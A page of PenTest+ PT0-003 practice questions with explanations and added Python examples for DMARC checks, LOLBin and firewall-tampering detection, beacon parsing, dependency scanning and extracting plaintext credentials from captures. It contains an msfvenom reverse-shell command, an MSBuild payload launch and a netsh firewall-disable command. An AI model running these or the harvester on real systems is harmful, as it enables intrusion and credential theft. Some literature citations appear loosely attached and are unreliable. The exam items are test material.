Practice Free PT0-003 Exam Online Questions
During the reconnaissance phase, a penetration tester collected the following information from the DNS records:
A -> www
A -> host
TXT -> vpn.comptia.org
SPF -> ip4:2.2.2.2
Which of the following DNS records should be in place to avoid phishing attacks using spoofing domain techniques?
- A . MX
- B . SOA
- C . DMARC
- D . CNAME
C
Explanation:
DMARC (Domain-based Message Authentication, Reporting & Conformance) is an email authentication protocol that helps prevent email spoofing and phishing. It builds on SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail), adds the alignment check that ties their results to the domain in the visible From: header, and gives the domain owner a way to tell receivers what to do with mail that fails and to receive reports about who is sending as the domain.
Understanding DMARC:
SPF: A TXT record listing which IP addresses may send mail on behalf of a domain; the SPF entry in the question (the single address 2.2.2.2) is this record. SPF alone checks the envelope sender (MAIL FROM), not the From: header the user sees.
DKIM: A signature over the message, verified with a public key published in DNS, that proves an email claiming to come from a domain was authorized by the owner of that domain.
DMARC: Uses SPF and DKIM to determine the authenticity of an email, requires one of them to align with the From: domain, and specifies what action to take if the email fails the checks.
Implementing DMARC:
Publish a DMARC policy as a TXT record at _dmarc.<domain>. The policy can tell receivers to reject, quarantine, or take no action on emails that fail the aligned SPF and DKIM checks.
Example DMARC record: v=DMARC1; p=reject; rua=mailto:[email protected];
Benefits of DMARC:
Helps to prevent email spoofing and phishing attacks.
Provides visibility into email sources through reports.
Enhances domain reputation by ensuring only legitimate emails are sent from the domain.
DMARC Record Components:
v: Version of DMARC (always DMARC1).
p: Policy for handling emails that fail the DMARC check (none, quarantine, reject).
sp: Policy for subdomains; defaults to p, so a subdomain such as vpn.comptia.org is covered unless sp is set weaker.
rua: Reporting URI for aggregate reports.
ruf: Reporting URI for failure (forensic) reports.
pct: Percentage of failing messages the policy is applied to (default 100).
Real-World Example:
A company sets up a DMARC policy with p=reject to ensure that any emails failing the aligned SPF or DKIM checks are rejected outright, significantly reducing the risk of phishing attacks using their domain. A policy of p=none, by contrast, only produces reports and still lets spoofed mail through, so a tester should read the p= and pct= values rather than just note that a record exists.
Reference from Pentesting Literature:
In "Penetration Testing – A Hands-on Introduction to Hacking," DMARC is mentioned as part of email security protocols to prevent phishing.
HTB write-ups often highlight the importance of DMARC in securing email communications and preventing spoofing attacks.
Reference: Penetration Testing – A Hands-on Introduction to Hacking; HTB Official Writeups
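The check a tester would actually run during reconnaissance, as an added example that is not part of the CompTIA guide or any tool it cites: read the SPF and DMARC TXT records of a domain and decide whether mail can be spoofed as that domain. The DNS answers are constructed inline (the domain names are placeholders) so the script runs offline; on an engagement you would resolve TXT for the domain and for _dmarc.<domain> and pass the strings in unchanged.

```python
"""Assess whether a domain can be spoofed from its SPF and DMARC TXT records."""

# Constructed TXT answers keyed by the queried name. secure.example models the
# question's records with a strict DMARC policy; the other two are deliberately weak.
SAMPLE_DNS = {
    "secure.example": ["v=spf1 ip4:2.2.2.2 -all"],
    "_dmarc.secure.example": ["v=DMARC1; p=reject; rua=mailto:dmarc@secure.example"],
    "weak.example": ["v=spf1 ip4:2.2.2.2 ~all"],
    "_dmarc.weak.example": ["v=DMARC1; p=quarantine; pct=10; sp=none"],
    "nodmarc.example": ["v=spf1 +all"],
}

CRITICAL, WARN = "critical", "warn"


def parse_tags(record):
    """Turn 'v=DMARC1; p=reject; rua=mailto:x' into {'v': 'DMARC1', 'p': 'reject', ...}."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def spf_findings(records):
    spf = [r for r in records if r.lower().startswith("v=spf1")]
    if not spf:
        return [(CRITICAL, "no SPF record: receivers cannot reject forged MAIL FROM senders")]
    if len(spf) > 1:
        return [(CRITICAL, "multiple SPF records: evaluates to permerror, SPF is ignored")]
    terms = spf[0].split()[1:]
    all_terms = [t for t in terms if t.lstrip("+-~?").lower() == "all"]
    if not all_terms:
        return [(WARN, "SPF has no 'all' mechanism: unlisted senders get a neutral result")]
    qualifier = all_terms[-1][0] if all_terms[-1][0] in "+-~?" else "+"
    return {
        "+": [(CRITICAL, "SPF ends with +all: every sending host passes")],
        "?": [(WARN, "SPF ends with ?all: neutral result, no protection on its own")],
        "~": [(WARN, "SPF ends with ~all: softfail, effective only when DMARC enforces")],
        "-": [],
    }[qualifier]


def dmarc_findings(records):
    dmarc = [r for r in records if r.lower().startswith("v=dmarc1")]
    if not dmarc:
        return [(CRITICAL, "no DMARC record: SPF/DKIM results are not tied to the From: domain")]
    tags = parse_tags(dmarc[0])
    policy = tags.get("p", "").lower()
    findings = []
    if policy not in ("none", "quarantine", "reject"):
        findings.append((CRITICAL, "DMARC p= tag missing or invalid: receivers ignore the record"))
    elif policy == "none":
        findings.append((CRITICAL, "DMARC p=none: monitoring only, failing mail is still delivered"))
    try:
        pct = int(tags.get("pct", "100"))
    except ValueError:
        pct = 100
    if policy in ("quarantine", "reject") and pct < 100:
        findings.append((WARN, f"DMARC pct={pct}: only {pct}% of failing mail gets the policy"))
    subpolicy = tags.get("sp", policy).lower()
    if policy in ("quarantine", "reject") and subpolicy == "none":
        findings.append((CRITICAL, "DMARC sp=none: subdomains such as vpn.<domain> remain spoofable"))
    if "rua" not in tags:
        findings.append((WARN, "no rua= tag: no aggregate reports, so abuse goes unnoticed"))
    return findings


def assess(domain, dns):
    """Return the findings for a domain and whether any of them makes it spoofable."""
    findings = spf_findings(dns.get(domain, [])) + dmarc_findings(dns.get("_dmarc." + domain, []))
    return {"domain": domain,
            "spoofable": any(sev == CRITICAL for sev, _ in findings),
            "findings": findings}


if __name__ == "__main__":
    for name in ("secure.example", "weak.example", "nodmarc.example"):
        result = assess(name, SAMPLE_DNS)
        print(f"{name}: spoofable={result['spoofable']}")
        for severity, text in result["findings"]:
            print(f"  [{severity}] {text}")
```

The severity split matters in a report: a softfail SPF (~all) on its own is only a warning, because a receiver applying a p=reject DMARC policy still rejects the forged message; the same ~all with p=none, or with no DMARC record at all, is what makes the domain usable for phishing.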
A tester plans to perform an attack technique over a compromised host.
The tester prepares a payload using the following command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp
The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml.
Which of the following commands would most likely be used by the tester to continue with the attack on the host?
- A . regsvr32 /s /n /u C:\evil.xml
- B . MSBuild.exe C:\evil.xml
- C . mshta.exe C:\evil.xml
- D . AppInstaller.exe C:\evil.xml
B
Explanation:
The msfvenom command produces the shellcode as a C# byte array (-f csharp). The tester then drops that array into evil.xml, an MSBuild project file whose inline task carries the C# loader for the shellcode. The execution method is therefore MSBuild.exe, which compiles and runs C# embedded in a project file:
Understanding MSBuild.exe:
Purpose: MSBuild is the Microsoft build engine. It processes project files written in XML and executes the tasks they define; it is commonly used to build .NET applications and can also compile and run code embedded in a project file through an inline task. Because it is a Microsoft-signed binary shipped with the .NET Framework (for example under C:\Windows\Microsoft.NET\Framework64\v4.0.30319\), it is present on hosts where unsigned executables are blocked, which is why attackers use it as a living-off-the-land launcher.
Command Usage:
Command: MSBuild.exe C:\evil.xml
This command tells MSBuild to process the evil.xml file, which contains the C# shellcode in an inline task. MSBuild compiles the task on the fly and executes it, so the payload runs inside the MSBuild process and the Meterpreter session connects back to 10.12.12.1:10112. Defenders look for exactly this pattern: MSBuild.exe launched from cmd.exe or PowerShell with a project file in a user-writable location such as C:\ or %TEMP%.
Comparison with Other Commands:
regsvr32 /s /n /u C:\evil.xml: Registers or unregisters DLLs and COM scriptlets, not a loader for C# embedded in a project file.
mshta.exe C:\evil.xml: Executes HTML applications (HTA files) and inline script, not an XML project containing C# code.
AppInstaller.exe C:\evil.xml: Installs AppX/MSIX packages, not relevant for executing C# code embedded in an XML file.
Using MSBuild.exe is the most appropriate method to execute the payload embedded in the XML file created by msfvenom.
During an engagement, a penetration tester found some weaknesses that were common across the customer’s entire environment. The weaknesses included the following:
Weaker password settings than the company standard
Systems without the company’s endpoint security software installed
Operating systems that were not updated by the patch management system
Which of the following recommendations should the penetration tester provide to address the root issue?
- A . Add all systems to the vulnerability management system.
- B . Implement a configuration management system.
- C . Deploy an endpoint detection and response system.
- D . Patch the out-of-date operating systems.
B
Explanation:
Identified Weaknesses:
Weaker password settings than the company standard: Indicates inconsistency in password policies across systems.
Systems without the company’s endpoint security software installed: Suggests lack of uniformity in security software deployment.
Operating systems not updated by the patch management system: Points to gaps in patch
management processes.
Configuration Management System:
Definition: A configuration management system automates the deployment, maintenance, and enforcement of configurations across all systems in an organization.
Benefits: Ensures consistency in security settings, software installations, and patch management across the entire environment.
Examples: Tools like Ansible, Puppet, and Chef can help automate and manage configurations, ensuring compliance with organizational standards.
Other Recommendations:
Vulnerability Management System: While adding systems to this system helps track vulnerabilities, it does not address the root cause of configuration inconsistencies.
Endpoint Detection and Response (EDR): Useful for detecting and responding to threats, but not for enforcing consistent configurations.
Patch Management: Patching systems addresses specific vulnerabilities but does not solve broader
configuration management issues.
Pentest Reference:
System Hardening: Ensuring all systems adhere to security baselines and configurations to reduce attack surfaces.
Automation in Security: Using configuration management tools to automate security practices, ensuring compliance and reducing manual errors.
Implementing a configuration management system addresses the root issue by ensuring consistent security configurations, software deployments, and patch management across the entire environment.
A penetration tester has just started a new engagement. The tester is using a framework that breaks the life cycle into 14 components.
Which of the following frameworks is the tester using?
- A . OWASP MASVS
- B . OSSTMM
- C . MITRE ATT&CK
- D . CREST
B
Explanation:
The OSSTMM (Open Source Security Testing Methodology Manual) is a comprehensive framework for security testing that includes 14 components in its life cycle.
Here’s why option B is correct:
OSSTMM: This methodology breaks down the security testing process into 14 components, covering various aspects of security assessment, from planning to execution and reporting.
OWASP MASVS: This is a framework for mobile application security verification and does not have a 14-component life cycle.
MITRE ATT&CK: This is a knowledge base of adversary tactics and techniques but does not describe a 14-component life cycle.
CREST: This is a certification body for penetration testers and security professionals but does not provide a specific 14-component framework.
Reference from Pentest:
Anubis HTB: Emphasizes the structured approach of OSSTMM in conducting comprehensive security assessments.
Writeup HTB: Highlights the use of detailed methodologies like OSSTMM to cover all aspects of security testing.
Conclusion:
Option B, OSSTMM, is the framework that breaks the life cycle into 14 components, making it the correct answer.
During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections.
Which of the following command-line utilities built into Windows is most likely to disable the firewall?
- A . certutil.exe
- B . bitsadmin.exe
- C . msconfig.exe
- D . netsh.exe
D
Explanation:
Understanding netsh.exe:
Purpose: Configures network settings, including interfaces, IP addresses, DNS, and Windows Firewall (advfirewall) settings.
Firewall Management: Can enable, disable, or modify firewall profiles and rules.
Disabling the Firewall:
Command: Use netsh.exe to turn the firewall off for every profile (domain, private, public).
netsh advfirewall set allprofiles state off
To confirm the starting state or the result, netsh advfirewall show allprofiles prints the state of each profile.
Usage in Penetration Testing:
Pivoting: Disabling the firewall can help the penetration tester pivot from one system to another by removing the host-based restrictions that block inbound connections (for example SMB or WinRM from the first compromised host).
Command Execution: The command requires an elevated (administrator) context; without it netsh reports that the requested operation requires elevation. The change is also logged by Windows Firewall and shows up in EDR/Sysmon process telemetry, so it is noisy; re-enable the firewall (state on) or document the change during cleanup.
Why not the others: certutil.exe (certificate utility, often abused to download or decode files) and bitsadmin.exe (BITS transfer jobs) do not manage the firewall, and msconfig.exe is a GUI for boot and startup settings.
Reference from Pentesting Literature:
netsh.exe is commonly mentioned in penetration testing guides for configuring network settings and managing firewalls.
HTB write-ups often reference the use of netsh.exe for managing firewall settings during network-based penetration tests.
Reference: Penetration Testing – A Hands-on Introduction to Hacking HTB Official Writeups
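The defender's side of the two host-based techniques above, the MSBuild/regsvr32/mshta payload launch from the evil.xml question and the netsh firewall-disable command from this one, as an added example that is not part of the CompTIA guide: a small set of process-creation rules run over constructed Sysmon Event ID 1-style events. The trusted build directories and the sample events are assumptions made for the example; in practice the same functions run over parsed EDR or Sysmon output.

```python
"""Flag process-creation telemetry for LOLBin payload launchers and firewall tampering."""

import ntpath
import re

# Assumed: directories from which MSBuild is expected to build real projects. A project
# file anywhere else (C:\, Temp, Downloads) is what the evil.xml technique looks like.
TRUSTED_BUILD_PATHS = ("c:\\program files", "c:\\program files (x86)", "c:\\src", "c:\\builds")
PROJECT_EXTENSIONS = (".xml", ".csproj", ".proj", ".vbproj", ".targets")

# Constructed sample telemetry in a Sysmon Event ID 1-like shape.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"MSBuild.exe C:\evil.xml",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Program Files\dotnet\MSBuild.exe",
     "CommandLine": r'"C:\Program Files\dotnet\MSBuild.exe" C:\src\app\app.csproj /t:Build',
     "ParentImage": r"C:\Program Files\dotnet\dotnet.exe"},
    {"Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh advfirewall set allprofiles state off",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh interface ip show config",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s /n /u C:\evil.xml",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]


def image_name(event):
    return ntpath.basename(event.get("Image", "")).lower()


def split_args(command_line):
    """Tokenise a Windows command line, keeping double-quoted paths intact."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', command_line)]


def check_msbuild(event):
    if image_name(event) != "msbuild.exe":
        return None
    for arg in split_args(event["CommandLine"])[1:]:
        low = arg.lower()
        if low.endswith(PROJECT_EXTENSIONS) and not low.startswith(TRUSTED_BUILD_PATHS):
            return f"msbuild_inline_task_from_untrusted_path: {arg}"
    return None


def check_regsvr32(event):
    if image_name(event) != "regsvr32.exe":
        return None
    low = event["CommandLine"].lower()
    if "/i:" in low or "scrobj.dll" in low or re.search(r"\.(xml|sct|txt)\b", low):
        return "regsvr32_scriptlet_or_non_dll_target"
    return None


def check_mshta(event):
    if image_name(event) != "mshta.exe":
        return None
    if re.search(r"(javascript:|vbscript:|https?://|\.hta\b|\.xml\b)", event["CommandLine"].lower()):
        return "mshta_inline_or_remote_script"
    return None


def check_netsh(event):
    if image_name(event) != "netsh.exe":
        return None
    low = re.sub(r"\s+", " ", event["CommandLine"].lower())
    if re.search(r"advfirewall set (allprofiles|domainprofile|privateprofile|publicprofile) state off", low):
        return "windows_firewall_disabled"
    if "firewall set opmode disable" in low:      # legacy (pre-advfirewall) syntax
        return "windows_firewall_disabled"
    if re.search(r"advfirewall firewall add rule .*action=allow", low):
        return "firewall_allow_rule_added"
    return None


CHECKS = (check_msbuild, check_regsvr32, check_mshta, check_netsh)


def classify(event):
    """Names of the rules an event trips (empty list when it looks benign)."""
    return [hit for check in CHECKS if (hit := check(event))]


def triage(events):
    return [(image_name(e), classify(e)) for e in events if classify(e)]


if __name__ == "__main__":
    for image, hits in triage(SAMPLE_EVENTS):
        print(image, hits)
```

The MSBuild rule keys on the project path rather than on MSBuild itself because build servers and developer workstations run MSBuild constantly; the netsh rule collapses whitespace first so that extra spaces, a common way to dodge naive string matches, do not hide the command.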
A penetration tester aims to exploit a vulnerability in a wireless network that lacks proper encryption. The lack of proper encryption allows malicious content to infiltrate the network.
Which of the following techniques would most likely achieve the goal?
- A . Packet injection
- B . Bluejacking
- C . Beacon flooding
- D . Signal jamming
A
Explanation:
If a wireless network lacks proper encryption, attackers can inject malicious packets into the traffic stream.
Packet injection (Option A):
Attackers forge and transmit fake packets to manipulate network behavior.
Common against WEP, where replayed ARP frames force IV reuse, and on open networks, where forged DHCP or DNS responses redirect clients.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Wireless Injection and Exploitation Techniques"
Incorrect options:
Option B (Bluejacking): Sends spam messages via Bluetooth, not for network exploitation.
Option C (Beacon flooding): Overloads wireless access points, not an attack on encryption.
Option D (Signal jamming): Disrupts connectivity but does not inject packets.
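What "lacks proper encryption" means on the wire, as an added example that is not part of the CompTIA guide or of aircrack-ng: a parser for 802.11 beacon frames that reads the Privacy capability bit and the RSN/WPA information elements to label a network as open, WEP, WPA1, WPA2 or WPA3, and says which kind of injection the tester can expect to work. The beacons are built by a helper in the block (constructed, not captured), so it runs offline; with a monitor-mode capture you would pass the raw frame bytes, minus the radiotap header, to parse_beacon.

```python
"""Classify a network's encryption from its beacon and state what injection it allows."""

import struct

ESS, PRIVACY = 0x0001, 0x0010              # capability bits in the beacon's fixed fields
SSID_IE, RSN_IE, VENDOR_IE = 0, 48, 0xDD
RSN_AKM = {1: "802.1X", 2: "PSK", 6: "PSK-SHA256", 8: "SAE"}   # last byte of 00-0F-AC-xx
WPA1_OUI_TYPE = b"\x00\x50\xf2\x01"


def build_beacon(ssid, privacy=False, rsn_akm=None, wpa1=False, pmf_required=False):
    """Constructed beacon: 24-byte MAC header, 12 bytes of fixed fields, then IEs."""
    bssid = b"\x02\x11\x22\x33\x44\x55"
    header = b"\x80\x00" + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    fixed = struct.pack("<QHH", 0, 100, ESS | (PRIVACY if privacy else 0))
    ies = bytes([SSID_IE, len(ssid)]) + ssid.encode()
    if rsn_akm is not None:
        caps = 0x00C0 if pmf_required else 0x0000          # MFPR|MFPC in RSN capabilities
        body = (b"\x01\x00" + b"\x00\x0f\xac\x04"                  # version 1, group CCMP
                + b"\x01\x00" + b"\x00\x0f\xac\x04"                # one pairwise suite: CCMP
                + b"\x01\x00" + b"\x00\x0f\xac" + bytes([rsn_akm])  # one AKM suite
                + struct.pack("<H", caps))
        ies += bytes([RSN_IE, len(body)]) + body
    if wpa1:
        body = (WPA1_OUI_TYPE + b"\x01\x00" + b"\x00\x50\xf2\x02"
                + b"\x01\x00" + b"\x00\x50\xf2\x02" + b"\x01\x00" + b"\x00\x50\xf2\x02")
        ies += bytes([VENDOR_IE, len(body)]) + body
    return header + fixed + ies


def rsn_details(body):
    """Return (AKM names, pmf_required) from an RSN IE body."""
    pairwise_count = struct.unpack_from("<H", body, 6)[0]
    off = 8 + 4 * pairwise_count
    akm_count = struct.unpack_from("<H", body, off)[0]
    off += 2
    akms = [RSN_AKM.get(body[off + 4 * i + 3], "unknown") for i in range(akm_count)]
    off += 4 * akm_count
    caps = struct.unpack_from("<H", body, off)[0] if off + 2 <= len(body) else 0
    return akms, bool(caps & 0x0040)       # bit 6 = MFPR, management frame protection required


def parse_beacon(frame):
    frame_control = frame[0]
    if (frame_control >> 2) & 0x3 != 0 or (frame_control >> 4) != 8:
        raise ValueError("not a beacon frame")
    _, _, capability = struct.unpack_from("<QHH", frame, 24)
    info = {"bssid": frame[16:22].hex(":"), "ssid": None,
            "privacy": bool(capability & PRIVACY), "rsn": None, "wpa1": False}
    off = 36
    while off + 2 <= len(frame):
        eid, length = frame[off], frame[off + 1]
        data = frame[off + 2: off + 2 + length]
        if len(data) != length:
            raise ValueError("truncated information element")
        if eid == SSID_IE:
            info["ssid"] = data.decode("utf-8", errors="replace")
        elif eid == RSN_IE:
            info["rsn"] = rsn_details(data)
        elif eid == VENDOR_IE and data[:4] == WPA1_OUI_TYPE:
            info["wpa1"] = True
        off += 2 + length
    return info


def assess(frame):
    """Map the beacon to a security label and the injection the tester can expect to work."""
    info = parse_beacon(frame)
    if not info["privacy"]:
        label, verdict = "open", "no encryption: forged data frames are accepted as-is"
    elif info["rsn"]:
        akms, pmf = info["rsn"]
        label = "WPA3-SAE" if "SAE" in akms else "WPA2-" + "/".join(akms)
        verdict = ("802.11w required: deauth/disassoc injection is dropped" if pmf
                   else "data injection needs the key; deauth injection still works")
    elif info["wpa1"]:
        label, verdict = "WPA1", "data injection needs the key; deauth injection still works"
    else:
        label, verdict = "WEP", "privacy bit without RSN/WPA IE: WEP, keystream-reuse injection works"
    return {"ssid": info["ssid"], "security": label, "verdict": verdict}


if __name__ == "__main__":
    for beacon in (build_beacon("Coffee-Free"), build_beacon("Legacy", privacy=True),
                   build_beacon("Corp", privacy=True, rsn_akm=2),
                   build_beacon("Corp-3", privacy=True, rsn_akm=8, pmf_required=True)):
        print(assess(beacon))
```

The Privacy bit alone is not enough to tell WEP from WPA: a WEP network sets it with no RSN or WPA element, which is why the WEP branch is the fallthrough. The RSN capabilities check matters for the tester too, because a network that requires protected management frames (802.11w) will ignore injected deauthentication frames, the usual first step of a WPA handshake capture.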
A penetration tester is performing a security review of a web application.
Which of the following should the tester leverage to identify the presence of vulnerable open-source libraries?
- A . VM
- B . IAST
- C . DAST
- D . SCA
D
Explanation:
Software Composition Analysis (SCA) is used to analyze dependencies in applications and identify vulnerable open-source libraries.
Option A (VM – Virtual Machine) ❌ : A VM is a computing environment, not a vulnerability detection tool.
Option B (IAST – Interactive Application Security Testing) ❌ : IAST analyzes runtime behavior, but it does not specialize in detecting vulnerable libraries.
Option C (DAST – Dynamic Application Security Testing) ❌ : DAST scans running applications for vulnerabilities, but it does not analyze open-source libraries.
Option D (SCA – Software Composition Analysis) ✅ : Correct.
Identifies security flaws in dependencies.
Used for managing supply chain risks.
Reference: CompTIA PenTest+ PT0-003 Official Guide – Software Composition Analysis (SCA)
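The core of what an SCA tool does, as an added example that is not part of the CompTIA guide or of any SCA product: parse a dependency manifest, normalise package names, and compare each pinned version against advisories that give an introduced/fixed range (the shape the OSV schema uses). The manifest and the advisories are constructed, and the advisory IDs are hypothetical placeholders rather than real CVEs.

```python
"""Minimal software composition analysis over a pinned Python manifest."""

import re

MANIFEST = """\
# constructed requirements.txt
requests==2.19.1
Django==3.2.1
PyYAML==5.4
markupsafe>=2.0
"""

ADVISORIES = [  # constructed, hypothetical advisories; version ranges are [introduced, fixed)
    {"id": "ADV-EXAMPLE-1", "package": "requests", "introduced": "0", "fixed": "2.20.0",
     "summary": "hypothetical advisory A"},
    {"id": "ADV-EXAMPLE-2", "package": "django", "introduced": "3.0", "fixed": "3.2.0",
     "summary": "hypothetical advisory B"},
    {"id": "ADV-EXAMPLE-3", "package": "pyyaml", "introduced": "0", "fixed": "5.4",
     "summary": "hypothetical advisory C"},
]

REQUIREMENT = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)\s*(==|>=|<=|~=|!=|>|<)?\s*([^\s#;]*)")


def normalize(name):
    """PEP 503 normalisation so 'PyYAML' and 'pyyaml' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def version_key(version, width=4):
    """Comparable key for dotted versions; non-numeric parts sort below numbers."""
    parts = []
    for piece in re.split(r"[.\-+]", version)[:width]:
        m = re.match(r"(\d+)(.*)", piece)
        parts.append((int(m.group(1)), m.group(2)) if m else (-1, piece))
    parts += [(0, "")] * (width - len(parts))
    return parts


def affected(version, advisory):
    """True when version falls inside [introduced, fixed); no 'fixed' means still open."""
    v = version_key(version)
    if v < version_key(advisory["introduced"]):
        return False
    fixed = advisory.get("fixed")
    return fixed is None or v < version_key(fixed)


def parse_manifest(text):
    """Yield (normalised name, operator, version) per requirement line; comments skipped."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        m = REQUIREMENT.match(line)
        if m:
            yield normalize(m.group(1)), m.group(2), m.group(3)


def scan(manifest, advisories):
    by_package = {}
    for adv in advisories:
        by_package.setdefault(normalize(adv["package"]), []).append(adv)
    findings, unresolved = [], []
    for name, operator, version in parse_manifest(manifest):
        if operator != "==":          # a range cannot be evaluated; SCA needs a lock file
            unresolved.append(name)
            continue
        for adv in by_package.get(name, []):
            if affected(version, adv):
                findings.append({"package": name, "version": version,
                                 "advisory": adv["id"], "fixed": adv.get("fixed")})
    return {"findings": findings, "unresolved": unresolved}


if __name__ == "__main__":
    report = scan(MANIFEST, ADVISORIES)
    for f in report["findings"]:
        print(f"{f['package']}=={f['version']} affected by {f['advisory']}, fixed in {f['fixed']}")
    print("unresolved (unpinned):", report["unresolved"])
```

The unresolved list is the point a tester should raise alongside the findings: a manifest with range specifiers cannot be assessed, and the reviewer needs the lock file (or the installed versions from the running environment) to know what actually ships.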
During a security assessment, a penetration tester captures plaintext login credentials on the communication between a user and an authentication system. The tester wants to use this information for further unauthorized access.
Which of the following tools is the tester using?
- A . Burp Suite
- B . Wireshark
- C . Zed Attack Proxy (ZAP)
- D . Metasploit
B
Explanation:
Capturing plaintext credentials in network traffic is done using packet sniffing. Wireshark is the best tool for this task.
Option A (Burp Suite) ❌ : Used for web application testing and intercepting HTTPS traffic, but not general network sniffing.
Option B (Wireshark) ✅ : Correct.
Wireshark is a packet analysis tool that captures unencrypted network traffic, including plaintext credentials.
Option C (ZAP – Zed Attack Proxy) ❌ : Similar to Burp Suite, but focused on web application security, not network packet capture.
Option D (Metasploit) ❌ : Metasploit is used for exploitation rather than capturing traffic.
Reference: CompTIA PenTest+ PT0-003 Official Guide – Packet Sniffing & Network Traffic Analysis
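The step a tester does by hand with Wireshark's Follow TCP Stream after this capture, as an added example that is not part of the CompTIA guide or of Wireshark: pull HTTP Basic, HTTP form and USER/PASS (FTP, POP3) credentials out of reassembled application-layer streams. The streams are constructed inline, with placeholder hosts and credentials; in practice you would export them with tshark (-z follow,tcp,raw) or read the pcap with a library such as scapy and pass each reassembled payload in.

```python
"""Extract plaintext credentials from captured application-layer streams."""

import base64
import re
from urllib.parse import parse_qs

USER_KEYS = {"user", "username", "login", "email", "uid", "j_username"}
PASS_KEYS = {"pass", "password", "passwd", "pwd", "j_password"}

# Constructed streams (label, reassembled payload); not from a real capture.
SAMPLE_STREAMS = [
    ("10.0.0.5:49152 -> 10.0.0.10:80",
     b"GET /admin HTTP/1.1\r\nHost: intranet.example\r\n"
     b"Authorization: Basic " + base64.b64encode(b"alice:Passw0rd!") + b"\r\n\r\n"),
    ("10.0.0.5:49153 -> 10.0.0.10:80",
     b"POST /login HTTP/1.1\r\nHost: intranet.example\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
     b"username=bob&password=hunter2%21&remember=1"),
    ("10.0.0.5:49154 -> 10.0.0.20:21",
     b"220 ftp ready\r\nUSER carol\r\n331 Password required\r\nPASS letmein\r\n230 Logged in\r\n"),
    ("10.0.0.5:49155 -> 10.0.0.30:110",
     b"+OK POP3 ready\r\nUSER dave@intranet.example\r\nPASS p0p3-secret\r\n+OK\r\n"),
    ("10.0.0.5:49156 -> 10.0.0.10:443",
     b"\x16\x03\x01\x00\x05\x01\x00\x00\x01\x00"),   # TLS handshake bytes: nothing to read
]


def from_http_basic(text):
    for m in re.finditer(r"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", text, re.I | re.M):
        try:
            decoded = base64.b64decode(m.group(1)).decode("utf-8", "replace")
        except ValueError:
            continue
        user, _, password = decoded.partition(":")
        yield "http-basic", user, password


def from_http_form(text):
    head, sep, body = text.partition("\r\n\r\n")
    if not sep or "application/x-www-form-urlencoded" not in head.lower():
        return
    fields = {k.lower(): v[0] for k, v in parse_qs(body).items()}
    user = next((fields[k] for k in USER_KEYS if k in fields), None)
    password = next((fields[k] for k in PASS_KEYS if k in fields), None)
    if user is not None and password is not None:
        yield "http-form", user, password


def from_user_pass(text):
    """FTP, POP3 and similar: a 'USER x' line followed by a 'PASS y' line."""
    user = None
    for m in re.finditer(r"^(USER|PASS)\s+(\S+)\s*$", text, re.M | re.I):
        if m.group(1).upper() == "USER":
            user = m.group(2)
        elif user is not None:
            yield "user-pass", user, m.group(2)
            user = None


EXTRACTORS = (from_http_basic, from_http_form, from_user_pass)


def harvest(streams):
    found = []
    for label, payload in streams:
        text = payload.decode("latin-1")     # byte-preserving; binary streams simply won't match
        for extractor in EXTRACTORS:
            for protocol, user, password in extractor(text):
                found.append({"stream": label, "protocol": protocol,
                              "user": user, "password": password})
    return found


if __name__ == "__main__":
    for cred in harvest(SAMPLE_STREAMS):
        print(f"{cred['stream']}  {cred['protocol']}  {cred['user']}:{cred['password']}")
```

The TLS stream yields nothing, which is the practical caveat behind the exam answer: Wireshark only gives up credentials when the protocol itself is unencrypted, and the same capture of an HTTPS login shows only the handshake. Burp or ZAP see the plaintext only because the client has been pointed at them as a proxy, which is a different position on the path.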
A penetration tester is performing an assessment focused on attacking the authentication identity provider hosted within a cloud provider. During the reconnaissance phase, the tester finds that the system is using OpenID Connect with OAuth and has dynamic registration enabled.
Which of the following attacks should the tester try first?
- A . A password-spraying attack against the authentication system
- B . A brute-force attack against the authentication system
- C . A replay attack against the authentication flow in the system
- D . A mask attack against the authentication system
C
Explanation:
OpenID Connect (OIDC) is an identity layer on OAuth 2.0: after the user authenticates, the identity provider (IdP) issues an ID token (a signed JWT) and usually an access token. Dynamic client registration lets anyone register a new client, with their own redirect URI, at the IdP without an administrator, so the tester can register a client, run the authorization flow end to end, and observe the tokens and the flow's anti-replay protections (state, nonce, PKCE, token lifetimes) directly. That makes a replay attack the cheapest thing to try first.
Replay attack (Option C):
The tester captures legitimate tokens or authorization responses and presents them again to impersonate the user. ID and access tokens are bearer tokens: if the relying party does not enforce exp, a one-time nonce bound to the login it started, and the audience, a captured token keeps working for as long as it is valid.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Attacking Identity Providers and OAuth"
Incorrect options:
Option A (Password spraying): Effective against user accounts, but this attack targets authentication tokens.
Option B (Brute-force attack): Less effective against OAuth-based authentication since tokens replace passwords.
Option D (Mask attack): Related to password cracking, not OAuth authentication attacks.
